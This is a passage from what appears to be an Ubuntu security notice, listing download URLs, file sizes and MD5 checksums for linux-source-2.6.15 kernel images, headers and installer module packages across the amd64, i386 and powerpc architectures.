http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    12648 7a5b7c88d879c5f8611add807b77dff5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    33808 f48b8b878206b3f559826c9177935c7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   138510 27d844c2fc790a35b13b9b68c0748ec0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    38938 c50f0d87787aacbb068bd4bfac99a953
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   278876 09d4db859ee11c8c17a5c755a38e103c

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    18976 1d3b491a97a3cafd02b9492bbf7f320c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    43488 3592e8676adb913653d31fd7d9254ab6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   105206 87f8b212932688293624f3c1e59c315e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     2286 a8cbb01c110d4788b8464a3ff357a6d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    34576 0d581950d36489a0ebc2e7aa43871105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    97044 3e789df7024c53456caf5ce65a095c3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    37132 fb21ce86da4297933bdd3acaeb02568a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    44126 a0e10d7f107c376bd0376cbeb7589d12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   167738 d6417b63d8c5511f21bc7857b1e6ef23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    33950 d833056cd1d32851c93cc61d3780b258
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   137978 3c251b1f57940da0f22e496ab4d9f6d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    46902 a916219f56dc797576f7cdf42535fe44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   133154 fdfe5b2d21ec36137e19d638cec2a39d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   273800 05e8313fec49c11084adb52deb26878d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   102328 ce88505cda9ff607c7bb685c60a4fb75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1597794 7a8768bb650b30137362b93c9aa2e4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.84_i386.deb
  Size/MD5:   857150 2de1fda09c98f8c7c0f5bb5adaf4dade
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb
  Size/MD5:   858572 83f459c63da9ce886855913a4012edf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.84_i386.deb
  Size/MD5:   859816 5fb638b3b741914410eb7fb331dc352e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb
  Size/MD5:   861156 732a23b93ee499deda765ee8dcd66346
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.84_i386.deb
  Size/MD5:   860324 57519a85aad5ad19b617c4676f28d7f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_i386.deb
  Size/MD5:  6918250 084d1cf58595b1cbadcbd7f16dc39756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.84_i386.deb
  Size/MD5: 21724888 f5fca5f423472946432ed46a990c1ddf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.84_i386.deb
  Size/MD5: 22517998 6ef9d114c0f9989e9e5a0a6d4af64cd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.84_i386.deb
  Size/MD5: 22265884 1ee20e38ac15055088248b99fe684e43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb
  Size/MD5: 23627106 b63abff51aa83dc377d5eb9235972302
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.84_i386.deb
  Size/MD5: 23179652 98de15fe41e4afa4100f6105b8003f8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    15510 9190bfcba4e54f10b48d3419f7c3d368
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   238512 1ab04364f536a96b5c2a127765f496da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   197142 3f27653e150b8dba0ee8b187d8826f5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1048396 03a161c4b52eb41c6d401133cd32557b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1741516 b42acfc4c67ddc9f0ee62bca1b54974e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   160898 fb7d22beea89de5012d2216d0eda3a6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     9166 38112f1195a5bb82137e1896994656fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    76470 c9b373c18450b29f9de3b1679249d31e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    53548 6b3491987d4f627c910d1823727dac53
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    33052 ddfeb1282d026c9b32978a5e04f1d3bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    85628 cf78a570b17bd819e61dc92f8a12355b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     6016 3e488082205ca42452081010da71004a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     8760 350a58a2f466e3f592b2c7bd2e8988bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    53636 3684ebb027993d843a17bf4c72b02b65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   130960 de27399a7d9abfb5f51abaeecc76ae6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    98472 5a5a0a34b4f405bcf0936087cf616586
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    77214 fb39917bbdb208d34fe6a74f0e83d53a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1768884 6cb328e8edc6b0a0fd27f2a90042c30a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    69614 2d2f95e1dba3de3dd1d963fb1f953e00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    11766 26e704eca4b49d3428687a2529990418
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    36106 522f5775e1a85646cc4d646f6eec6cc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   132660 97ac208287c24264bc384b1e1f253ab7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    38574 d825ca1fbb12c5a8cd2d15b094726011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   299152 345d6c44429a0a6af9d23179fb78ec8d

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    23728 02cb39b583ee98c8d1a57ce3e5b163c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    26006 87d2de748a7344d11fb11f8264571dd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    49334 0847429f9dedb0f286d1c32cb3e8f467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    51536 9ec5c9b175a6728442ddf73aa218592f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2306 b23053a32da0479242caeff6e2ae8b6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2482 05329a184127afb2a7e48d427feafbf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40308 cd883cbcca861116d2518f57f47dc941
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    43844 a1c3942c443e444816749c64439275e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   112600 098304fe251f9d8c49849946d8ac2aeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   120740 df40f802ec2ee163a813ea0a3603aeb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40906 6cc3a287b3274036e57638d951480d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    46002 f8964625617902880cc24e8e22e03ba9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    29026 8607a334399fbe27ee424e5bc0a20103
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    29894 9e6fe015d74dd83cccedcfd8f396fbd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   211398 ad7cb3fdf5693590d0f7056e8b9acc6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   225188 6a00a7254a9a82981f23823145ca5a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    45056 c00c74d1ffa33fb6575e59067c90cfa0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40224 ca94464b9c6eca3e9c8eeec160125e88
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     1940 70846ff3e24ac904d034f07126d64a9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2200 fa5bc162b62817d3c9f5c055d88d6016
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    80762 dead1604f5dff825e55e5299d06488dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    86134 50f5270dc53e13c36aa423d3fb6b0af1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   111594 64c98d595b636e46123746b50eb18cd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   125750 cad66f8b2febf24ba43c5a7db6a22312
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    53424 c668f84292a263caef7ce813b769822e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    58488 8903219e8e58a8d79564945284f00e34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   147966 1566e7aa02add4341766fd937fc907ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   161910 164c7d5ef77d1693a631ce60fcc4ef8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   318400 a6441e2cd0b1b9ecb1601516f89ff6ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   288040 bd11c9922fea1638ce64b776f060f81f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   115862 9eb166a9f0fb53dfd89d657cc835d10f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   116550 41e72d8893ca5a8351df20b6c7c5d2bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1925168 1ad660874ee5005becbc5841bf0e9b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  2449218 45d3b3e3f88b9e764c3243c2858d3730
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb
  Size/MD5:   867470 f6031f3c87c28ee40eefa25086b71c52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb
  Size/MD5:   868848 cd0781159d8768b9c92bae2d844d7b6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb
  Size/MD5:   870010 f3f837cb5cd7e1fe97182ddbb7eb1a56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb
  Size/MD5:  6946990 d65d0ad6fdc2493e7e6c1a9d567424f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb
  Size/MD5: 22784626 aef1ff7ccf13cd2e2d41c80f22264eeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb
  Size/MD5: 23693200 0443d7e8b68c5f89aaf7e02e666077f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb
  Size/MD5: 22365476 97b5182024c5fe55fe1d45b23a39a277
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    17786 39dca7a61069a0e3c0877662e3fbb571
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    17392 b0b9f69f913131d17af3ab6d4bd6e8b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   261374 b0b06da41991553a487982e73fe34176
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   282628 81e78bd764bb0fc65be704f3f0be4db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   227826 39456da28b0f6baa3b74b842eba6acf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   248944 94f3cc4cabe7f4344ea0c6ca8d6487d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1048472 a6d7ef42bf3b8de677ec5fe562228e7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1048600 5e01699eaac6cd159a04c724e442e321
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1738662 d43bf20af0979b29ad1c6df616862056
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1878206 711e748077e06773658c64416bfa83be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   250824 9d2ad9e9b79a628140775760c6fb2493
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   233538 0730a8fbc4148651919c3a74c3e1face
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    13058 11382e6f8ed79855a01a6151733d4549
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    13532 ad6adbe2c5040390d563fb6221a7a346
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    84800 0159144d3b6d69b9e319731669dea56e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    52202 9ddf5200aca5383eae56f5b7ab414c3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    73934 43991eb97d8f163e7763dc89cef5b1aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    85852 20dd6d2d5ea003539e1b4f7f37bb83ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     6622 2d7cc5ebe8079dd0fae1860409cf1a8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     7060 4dc37eb02f6742808d26548a0ecb79ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    60382 24f359b6596789e61bbd001fd90c5a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    70426 8128abfff4f7ab8f32370a151dd27602
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   128552 86b1f62ab4d815af984fea8e0556fd0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   157952 675fec1992efcfa46cf0043e3507513d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   108160 eb2056a3b1940d3b3b27adcb8df1e68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   126140 d1c23f615d6aeebe6594386d424ef7f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    87300 47e6e945e4651347cde5e76965131a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    93364 802c107ffe461103294fd58c1d12b139
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  2014806 d15cb3eea9558346c08029994feba932
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1988698 47499eab748909cbc24d41eb251bd57e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   104128 3e626e3e4c59a16338d00953874420d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   115796 5ff731f56aac5f43999c70e98d250892
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    12740 3b4d8bea0a856073ea6116bcdafed867
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    14446 9796772a49dc9688c64fde72be43f446
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    39954 6491b77cf30155c06612af32748ab26d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    41542 c99144c5929ec38a934702c2e041e0df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   149346 8d4aab9ae6c9f04ed1d4968708c14c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   168124 72dcb481cb91bfb750e7d7cb3b2bab4c
